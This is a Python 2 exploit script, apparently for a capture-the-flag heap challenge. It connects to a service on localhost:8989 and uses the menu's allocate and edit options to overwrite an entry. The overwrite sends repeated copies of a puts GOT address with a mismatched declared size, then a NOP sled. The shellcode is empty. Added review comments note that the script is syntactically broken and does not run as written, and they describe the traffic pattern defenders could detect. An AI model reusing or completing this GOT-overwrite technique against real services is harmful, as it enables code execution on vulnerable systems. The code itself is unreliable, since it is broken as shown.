#!/usr/bin/python
from socket import *
from struct import *
# Pack an int as 4 little-endian bytes (the target is treated as 32-bit LE).
p = lambda x : pack("<L",x)
# NOTE(review): named like an unpack helper, but this packs and then returns
# only the first byte of the packed string; nothing in this file calls it.
up = lambda x : pack("<L",x)[0]
# TCP connection to a service on loopback. It is opened at import time as a
# module-level side effect, so merely importing this file connects; main()
# and the helpers below all use this global socket.
s = socket(AF_INET,SOCK_STREAM)
s.connect(('127.0.0.1',8989))
# Address the author labels as the puts entry of the target's GOT. It is a
# property of that specific binary and cannot be verified from this file.
puts_got = 0x0804A008
# Empty here, so the payload below is 90 NOP bytes (0x90) followed by nothing
# and carries no executable code as written.
shellcode = ""
nopsled = "\x90"*90
payload = nopsled+shellcode
def write(s,size)
    """Send menu option "1" on s, read one reply, then send size.

    Presumably the target's allocate/write menu item; the protocol is only
    visible through these sends. NOTE(review): the def line has no trailing
    colon, and main() passes size as an int (write(s,4)) although
    socket.send requires a str in Python 2, so this does not run as shown.
    """
    s.send("1\n")
    s.recv(1024)
    s.send(size)
def change(s,num,size,data):
    """Send menu option "3", then num, size and data, reading a reply after each.

    Looks like the target's edit-entry menu item: num selects an entry, size
    is the length the target is told, data is what is actually sent. Nothing
    here checks that len(data) matches size -- the target is relied on to
    enforce it. NOTE(review): main() passes num and size as ints, but
    socket.send requires a str in Python 2.
    """
    s.send("3\n")
    s.recv(1024)
    s.send(num)
    s.recv(1024)
    s.send(size)
    s.recv(1024)
    s.send(data)
def main():
    """Drive the target over the module-level socket s.

    As written: print the banner, allocate a 4-byte entry, edit entry 0
    claiming size 100 while sending 36 bytes (nine copies of puts_got),
    allocate another 4-byte entry, edit entry 0 again with payload
    (90 NOP bytes, no code), then send "1". The claimed-size/sent-data
    mismatch and the re-edit of entry 0 after a second allocation suggest
    the target's entry management is what is being exercised; for a
    defender that transaction shape (declared size larger than the data,
    repeated pointer-sized values, 0x90 runs) is the thing to log and alert on.
    """
    # Python 2 print statement; the whole script assumes Python 2 str-as-bytes.
    print s.recv(2048) #start!
    write(s,4)
    s.recv(1024)
    # 9 * 4 bytes = 36 bytes sent against a declared size of 100.
    change(s,0,100,p(puts_got)*9)
    s.recv(1024)
    write(s,4)
    s.recv(1024)
    change(s,0,len(payload),payload)
    s.recv(1024)
    s.send("1\n")
# Script entry point. Note the socket above is already connected at import
# time, so this guard only delays the protocol exchange, not the connection.
if __name__=="__main__":
    main()
CLEAR!